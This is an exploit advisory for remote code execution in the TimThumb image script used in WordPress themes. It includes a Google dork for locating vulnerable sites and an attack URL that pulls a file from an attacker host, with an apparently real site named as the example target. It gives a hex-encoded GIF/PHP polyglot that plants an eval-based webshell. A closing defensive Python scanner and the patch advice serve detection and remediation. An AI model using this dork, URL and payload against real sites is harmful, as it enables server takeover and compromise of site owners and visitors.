# Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
# Date: 3rd August 2011
# Author: MaXe
# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
# Version: 1.32
WordPress TimThumb (Theme) Plugin - Remote Code Execution
Versions Affected:
1.* - 1.32 (Only versions 1.19 and 1.32 were tested.)
(Version 1.33 did not save the cache file as .php)
Info: (See references for original advisory)
TimThumb is an image resizing utility, widely used in customized WordPress themes.
External Links:
http://www.binarymoon.co.uk/projects/timthumb/
http://code.google.com/p/timthumb/
Credits:
-Mark Maunder (Original Researcher)
-MaXe (Independent Proof of Concept Writer)
-:: The Advisory ::-
TimThumb is prone to a Remote Code Execution vulnerability because the
script does not check remotely cached files properly. By crafting a
special image file with a valid MIME-type and appending PHP code to
the end of it, it is possible to fool TimThumb into believing that it
is a legitimate image, so that it caches the file locally in the cache directory.
Attack URL: (Note! Some websites use Base64 encoding of the src GET parameter.)
http://www.bkjia.com/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php
Stored file on the target: (This can change from host to host.)
1.19: http://www.bkjia.com/wp-content/themes/THEME/cache/md5($src)
1.32: http://www.bkjia.com/wp-content/themes/THEME/cache/external_md5($src)
md5($src) means the input value of the 'src' GET parameter, hashed in MD5 format.
Proof of Concept File:
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
(Transparent 1x1 GIF + <?php @eval($_GET['cmd']); ?>)
-:: Solution ::-
Update to the latest version 1.34 or delete the timthumb file.
NOTE: This file is often renamed and you should therefore issue
a command like this in a terminal: (Thanks to rAWjAW for this info.)
find . | grep php | xargs grep -s timthumb
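As an added defender-side example (not part of the advisory), a Python check that does what the grep above does and one step more: it walks a WordPress install, finds TimThumb copies by content (the file is often renamed), and flags cache entries that begin with an image signature yet contain a PHP open tag, the image/PHP polyglot the advisory describes. The sample tree it builds is constructed for the demonstration, not taken from any real site.

```python
import os
import re
import tempfile

# Magic bytes of the image types TimThumb handles (GIF, PNG, JPEG). A cached file
# that starts with one of these but also carries a PHP open tag is a polyglot.
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")
PHP_TAG = re.compile(rb"<\?php|<\?=")

def is_image_php_polyglot(data: bytes) -> bool:
    """True when data looks like an image but embeds a PHP open tag anywhere."""
    return data.startswith(IMAGE_MAGIC) and PHP_TAG.search(data) is not None

def scan(root: str) -> dict:
    """Walk a WordPress tree; report TimThumb copies and polyglot cache files."""
    findings = {"timthumb_copies": [], "polyglots": []}
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            # Same idea as the advisory's grep: match on content, not file name.
            if name.endswith(".php") and b"timthumb" in data.lower():
                findings["timthumb_copies"].append(rel)
            if is_image_php_polyglot(data):
                findings["polyglots"].append(rel)
    return findings

def build_sample_tree() -> str:
    """Constructed fixture: a theme with a renamed TimThumb and one poisoned cache entry."""
    root = tempfile.mkdtemp()
    theme = os.path.join(root, "wp-content", "themes", "THEME")
    cache = os.path.join(theme, "cache")
    os.makedirs(cache)
    # Renamed copy of the script (constructed stand-in, only the string the scan keys on).
    with open(os.path.join(theme, "thumb.php"), "wb") as fh:
        fh.write(b"<?php\n// timthumb image resizer (constructed stand-in)\n")
    # A 1x1 transparent GIF, stored once clean and once with a PHP tag appended.
    gif = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00\x21\xf9\x04"
           b"\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b")
    with open(os.path.join(cache, "external_clean"), "wb") as fh:
        fh.write(gif)
    with open(os.path.join(cache, "external_poisoned.php"), "wb") as fh:
        fh.write(gif + b"\x00<?php /* constructed marker, not a shell */ ?>")
    return root

def demo() -> dict:
    return scan(build_sample_tree())
```

Run against a real install with scan("/path/to/wordpress"); anything in "polyglots" under a theme cache directory should be treated as evidence of the cache-poisoning described above.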
Disclosure Information:
-Vulnerability Disclosed (Mark Maunder): 1st August 2011
-Vulnerability Researched (MaXe): 2nd August 2011
-Disclosed at The Exploit Database: 3rd August 2011